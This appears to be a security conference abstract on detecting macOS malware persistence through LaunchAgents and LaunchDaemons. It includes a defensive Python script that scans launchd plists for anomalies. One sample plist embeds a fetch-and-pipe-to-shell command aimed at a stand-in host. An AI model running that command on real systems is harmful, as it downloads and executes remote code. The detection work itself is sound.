Demystifying macOS: An investigation into the dynamics of macOS attacks

Akhil Reddy, Bharath Manapati, Rakesh Sharma/FireEye

There is a common myth that macOS is very secure. As with most myths, there is a grain of truth to this one, owing to the anti-malware features built into the OS, such as Gatekeeper and XProtect. We have, however, observed malware delivered via 0-day exploits that circumvented all of these protections and infected users, which shows that macOS machines also need to be monitored for malicious activity.

Attackers leverage LaunchAgents and LaunchDaemons to establish persistence and attempt to disguise them to avoid suspicion. Some of these attacks weaponize built-in tools for data exfiltration. In this presentation, we dive into an investigative, behavior-based approach to identifying the anomalies on an infected Mac and tracing them back to the responsible binary or application and its artifacts.
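As an added illustration of the kind of anomaly-hunting described above (this is not FireEye's tooling and not code from the talk), the script below parses launchd property lists, resolves the program each job starts, and flags the patterns an investigator typically looks for: an Apple-looking label outside /System, a program living in a temp or hidden directory, a built-in interpreter run with an inline command or remote URL, and RunAtLoad plus KeepAlive on top of another signal. The four sample plists are constructed in-line to stand in for files under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons; the heuristics, directory lists and finding names are the example's own assumptions.

```python
"""Heuristic triage of launchd LaunchAgent/LaunchDaemon plists.

Added example, not FireEye code. The anomaly rules and the sample plists
below are assumptions chosen to illustrate the approach, not a real dataset.
"""
import plistlib
import re
from typing import Dict, List, Optional

# Directories from which a persistent job's program should rarely run (assumed list).
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                   "/Users/Shared/", "/var/folders/")

# Built-in interpreters/utilities that malware commonly wraps in a launchd job (assumed list).
BUILTIN_TOOLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/python", "/usr/bin/python3",
                 "/usr/bin/osascript", "/usr/bin/curl", "/usr/bin/perl", "/usr/bin/ruby"}

# Where Apple's own launchd jobs live; a com.apple.* label elsewhere is worth a look.
APPLE_SYSTEM_DIRS = ("/System/Library/LaunchAgents/", "/System/Library/LaunchDaemons/")


def program_of(job: dict) -> Optional[str]:
    """Return the executable a job starts: Program wins over ProgramArguments[0]."""
    if isinstance(job.get("Program"), str):
        return job["Program"]
    args = job.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        return args[0]
    return None


def analyze_plist(plist_path: str, data: bytes) -> dict:
    """Parse one plist (XML or binary) and return label, program and findings."""
    job = plistlib.loads(data)
    label = job.get("Label", "")
    program = program_of(job)
    args = job.get("ProgramArguments") or []
    findings: List[str] = []

    # 1. Label impersonates Apple but the plist is not in an Apple directory.
    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_SYSTEM_DIRS):
        findings.append("apple-label-outside-system-dir")

    if program:
        # 2. Program sits in a scratch directory or under a hidden path component.
        if program.startswith(SUSPICIOUS_DIRS):
            findings.append("program-in-temp-dir")
        if any(part.startswith(".") for part in program.split("/") if part):
            findings.append("program-in-hidden-path")
        # 3. Built-in tool invoked with inline code, a download URL or encoded data.
        if program in BUILTIN_TOOLS:
            joined = " ".join(a for a in args[1:] if isinstance(a, str))
            if re.search(r"https?://|-c\s|-e\s|base64", joined):
                findings.append("builtin-tool-with-inline-payload")

    # 4. Auto-start and keep-alive only matter once another signal is present.
    if job.get("RunAtLoad") and job.get("KeepAlive") and findings:
        findings.append("runatload-keepalive")

    return {"path": plist_path, "label": label, "program": program, "findings": findings}


def scan(plists: Dict[str, bytes]) -> Dict[str, dict]:
    """Analyze a mapping of plist path -> raw bytes; keep only entries with findings."""
    results = {}
    for path, data in plists.items():
        report = analyze_plist(path, data)
        if report["findings"]:
            results[path] = report
    return results


# Constructed samples (not real malware artifacts), serialized as real plist XML.
SAMPLE_PLISTS: Dict[str, bytes] = {
    "/Library/LaunchAgents/com.apple.softwareupdate.plist": plistlib.dumps({
        "Label": "com.apple.softwareupdate",
        "ProgramArguments": ["/Users/alice/Library/.cache/updater"],
        "RunAtLoad": True, "KeepAlive": True}),
    "/Users/alice/Library/LaunchAgents/com.example.helper.plist": plistlib.dumps({
        "Label": "com.example.helper",
        "ProgramArguments": ["/bin/sh", "-c", "curl -s http://example.invalid/p | sh"],
        "RunAtLoad": True}),
    "/Library/LaunchDaemons/com.updater.plist": plistlib.dumps({
        "Label": "com.updater",
        "ProgramArguments": ["/private/tmp/.x/svc", "--daemon"]}),
    "/Library/LaunchDaemons/com.vendor.agent.plist": plistlib.dumps({
        "Label": "com.vendor.agent",
        "Program": "/Library/Application Support/Vendor/agent",
        "RunAtLoad": True, "KeepAlive": True}),
}

if __name__ == "__main__":
    for path, report in scan(SAMPLE_PLISTS).items():
        print(f"{path}\n  label={report['label']} program={report['program']}")
        print("  findings: " + ", ".join(report["findings"]))
```

On a live system the same functions can be fed the output of a directory walk over the three LaunchAgents/LaunchDaemons locations; the resolved program path is the starting point for tracing the job back to its binary, its code signature and the application bundle that dropped it.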

As part of the presentation, we will analyze some of the recent Mac malware seen in the wild, such as LAMEPYRE, NETWIRE and MOKES. NETWIRE and MOKES were delivered via a Firefox 0-day exploit that bypassed all defense mechanisms. The analysis covers how the malware was able to bypass Gatekeeper and XProtect. We will further discuss how to use built-in tools for this analysis.

In conclusion, we will demonstrate how behavior-based techniques can help detection engines proactively identify unknown threats in the Mac threat landscape.

November 7 at 16:10 - 16:40, Stage B